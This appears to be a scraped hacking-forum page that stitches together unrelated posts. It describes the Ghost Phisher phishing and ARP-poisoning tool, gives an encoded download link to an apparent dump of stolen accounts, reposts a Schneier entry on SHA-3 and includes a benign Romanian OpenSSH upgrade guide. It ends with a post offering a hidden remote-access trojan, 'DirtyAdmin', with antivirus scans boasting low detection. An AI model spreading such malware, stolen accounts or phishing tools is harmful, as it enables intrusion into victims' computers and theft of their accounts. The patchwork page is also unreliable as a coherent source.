Leaderboard

Penetration ARP Cache Poisoning Ghost Phisher is a Wireless and Ethernet security auditing and attack software program written using the Python Programming Language and the Python Qt GUI library, the program is able to emulate access points and deploy various internal networking servers for networking, penetration testing and phishing attacks. Operating System Supported The Software runs on any Linux mahine with the programs prerequisites, But the program has been tested on the following Linux based Operating Systems: Ubuntu KDE/GNOME BackTrack Linux BackBox Linux Prerequisites The Program requires the following to run properly: The following dependencies can be installed using the Debian package installer command on debian based systems using "apt-get install program" or otherwise downloaded and installed manually Aircrack-NG Python-Scapy Python Qt4 Python Subversion Xterm Metasploit Framework (Optional) Features Ghost Phisher currently supports the following features: HTTP Server Inbuilt RFC 1035 DNS Server Inbuilt RFC 2131 DHCP Server Webpage Hosting and Credential Logger (Phishing) Wifi Access point Emulator Session Hijacking (Passive and Ethernet Modes) ARP Cache Poisoning (MITM and DOS Attacks) Penetration using Metasploit Bindings Automatic credential logging using SQlite Database Update Support download : https://code.google.com/p/ghost-phisher/downloads/list

Cateva conturi Download: aHR0cCUzQS8vd3d3Lm1lZGlhZmlyZS5jb20vJTNGMWEwNjB2MzIwOWdtYXpk Encryption: 46esab (de la dreapta la stanga) Password: rstcenter.com Bafta

SHA-3 to Be Announced NIST is about to announce the new hash algorithm that will become SHA-3. This is the result of a six-year competition, and my own Skein is one of the five remaining finalists (out of an initial 64). It's probably too late for me to affect the final decision, but I am hoping for "no award." It's not that the new hash functions aren't any good, it's that we don't really need one. When we started this process back in 2006, it looked as if we would be needing a new hash function soon. The SHA family (which is really part of the MD4 and MD5 family), was under increasing pressure from new types of cryptanalysis. We didn't know how long the various SHA-2 variants would remain secure. But it's 2012, and SHA-512 is still looking good. Even worse, none of the SHA-3 candidates is significantly better. Some are faster, but not orders of magnitude faster. Some are smaller in hardware, but not orders of magnitude smaller. When SHA-3 is announced, I'm going to recommend that, unless the improvements are critical to their application, people stick with the tried and true SHA-512. At least for a while. I don't think NIST is going to announce "no award"; I think it's going to pick one. And of the five remaining, I don't really have a favorite. Of course I want Skein to win, but that's out of personal pride, not for some objective reason. And while I like some more than others, I think any would be okay. Well, maybe there's one reason NIST should choose Skein. Skein isn't just a hash function, it's the large-block cipher Threefish and a mechanism to turn it into a hash function. I think the world actually needs a large-block cipher, and if NIST chooses Skein, we'll get one. via https://www.schneier.com/blog/archives/2012/09/sha-3_will_be_a.html

Introducere Multe dintre distributiile de linux vin cu daemonul OpenSSH preinstalat. OpenSSH este un inlocuitor pentru rlogniuri, rsh, rcp, ftp, x11 si protocoale telnet care nu ofera encriptie si prezinta multe vulnerabilitati, precum posibilitatea de a face hijacking sesiunii, ip spoofing si alte atacuri. OpenSSH de asemenea are optiunea de a face port forwarding encriptat, o unealta necesara de multe ori. Oricine cunoaste notiunile de securitate stie ca ar fi trebuit sa renunte de mult la telnet si sa se axeze doar pe loginuri ssh. Problema apare, insa, atunci cand trebuie sa upgradati daemonul ssh. Daca masina dumneavoastra este la mile distanta si poate fi accesata doar prin acces SSH, ultimul lucru care ati dori sa se intample e ca sshd-ul sa se strice in timpul upgradeului. Majoritatea dintre voi nu realizati ca puteti omora procesul serverului sshd (cel care primeste conexiunile), chiar fara a omora alte conexiuni deja existente. Asta inseamna ca va puteti loga, omora procesul serverului dar continua munca pana cand va delogati. In schimb, majoritatea dintre voi cred ca aveti nevoie sa faceti upgrade si apoi sa dati reboot pentru ca schimbarile sa aiba efect. Procedura urmatoare este foarte "paranoida" , asta doar pentru a fi sigur ca totul decurge conform planului. Procesul in sine Voi asuma ca fisierele ssh sunt in directorul /etc/ssh , iar binaryul sshd este locat in /usr/sbin . 1. Faceti o copie a daemonului sshd curent pe portul 9999 . server# mkdir /root/ssh-whoops server# cd /root/ssh-whoops server# cp -p /etc/ssh/* /usr/sbin/sshd . server# /root/ssh-whoops/sshd -p 9999 -f /root/ssh-whoops/sshd_config 2. Conectati-va la masina pe acest port de cateva ori pentru a va asigura ca functioneaza, si pastrati cateva sesiuni de login in cazul in care se vor intampla lucruri rele pe parcurs. home$ ssh MACHINE -p 9999 home$ ssh MACHINE -p 9999 home$ ssh MACHINE -p 9999 home$ (repetati pana cand sunteti satisfacuti) 3. Upgradati serverul prin una din urmatoarele metode, dupa preferinte : server# rpm -F ... sau server# apt-get update && apt-get upgrade sau server# ./configure && make && make install 4. Gasiti id-ul procesului sshd . server# ps -ef | grep sshd root 10283 12684 0 Feb05 ? 00:00:05 /usr/sbin/sshd root 12684 1 0 Dec03 ? 00:01:21 /usr/sbin/sshd root 15446 1 0 4:15 ? 00:00:00 /usr/sbin/sshd -p 9999 -f ... root 15846 15446 0 4:16 ? 00:00:00 /usr/sbin/sshd -p 9999 -f ... root 15850 15446 0 4:16 ? 00:00:00 /usr/sbin/sshd -p 9999 -f ... root 16748 12684 0 Feb25 ? 00:00:00 /usr/sbin/sshd P.S: Procesul care il cautati va fi pentru daemon (ex. PPID = 1), cel care *nu* ruleaza cu argumentele '-p 9999'.In lista de mai sus, procesul este #12684 . 5. Omorati procesul sshd . server# kill 12684 6. Deschideti noul daemon ssh (imi voi asuma ca l-ati instalat in /usr/sbin, unde era instalat originalul). server# /usr/sbin/sshd 7. Logati-va si sperati ca totul a iesit bine. home$ ssh -v MACHINE 8. Asigurati-va vedeti versiunea dorita in outputul debuggingului. De exemplu, daca ati updatat la 5.8 , ar trebui sa vedeti o linie ca si urmatoarea: Remote protocol version 1.99, remote software version OpenSSH_5.8 Note Versiunile mai vechi de OpenSSH 1.x nu pot fi upgradate in acest mod. Multumesc pentru ca ati citit!

With this trojan can get full access to the victim's computer. Troy runs invisibly in the background, Ammi and passes AmmyyID a simple admin panel. In the current version of the e-mail attachment AmmyyAdmin + + + SURSA DE CONTROL PANEL Screenshot admin+scan RDP... Troy was written in PureBasic 4.40 + v `s lib Droopy download : DirtyAdmin (2).zip pass! pm scan : novirusthnks Report date: 2012-09-25 12:47:55 (GMT 1) File name: dirtyadmin-exe File size: 753664 bytes MD5 hash: 1c123e1aff5f2b9733b392d1bfddc7b2 SHA1 hash: 2f613a696f13f41d6b60bc180d45bd745e4aefe6 Detection rate: 4 on 14 (29%) Status: INFECTED Asquared 12:47:55 5.1.0.3 Packed.Win32.PePatch!IK Avast 12:47:55 5.0 AVG 12:47:55 10.0.0.1190 Avira 12:47:55 7.11.7.12 TR/Fakealert.41092 BitDefender 12:47:55 7.0.0.2555 ClamAV 12:47:55 0.97.4 Comodo 12:47:55 1.0 DrWeb 12:47:55 5.0.2 Fprot 12:47:55 6.0 W32/Heuristic-400!Eldorado (not disinfectable) IkarusT3 12:47:55 T31001097 Packed.Win32.PePatch Panda 12:47:55 10.0.3.0 STOPZilla 12:47:55 5.0.0.0 TrendMicro 12:47:55 9.200.0.1012 VBA32 12:47:55 3.12.0.300 Multi-Engine Antivirus Scanner - Services - NoVirusThanks.org Report date: 2012-09-25 12:53:03 (GMT 1) File name: aav3-exe File size: 722736 bytes MD5 hash: f9cde592fcd907fb00807124df17c2f1 SHA1 hash: 2201acef47c9fea390c1c5ccd2e67257f5551b77 Detection rate: 1 on 14 (7%) Status: INFECTED Asquared 12:53:03 5.1.0.3 Riskware.RemoteAccess.Win32.AmmyyAdmin.AMN!A2 Avast 12:53:03 5.0 AVG 12:53:03 10.0.0.1190 Avira 12:53:03 7.11.7.12 BitDefender 12:53:03 7.0.0.2555 ClamAV 12:53:03 0.97.4 Comodo 12:53:03 1.0 DrWeb 12:53:03 5.0.2 Fprot 12:53:03 6.0 IkarusT3 12:53:03 T31001097 Panda 12:53:03 10.0.3.0 STOPZilla 12:53:03 5.0.0.0 TrendMicro 12:53:03 9.200.0.1012 VBA32 12:53:03 3.12.0.300 Multi-Engine Antivirus Scanner - Services - NoVirusThanks.org e detectat, dar merge de minune! useri cu 0 posturi sa nu cereti pass, ca nu va dau! parola, pentru useri de 20 de posturi in sus!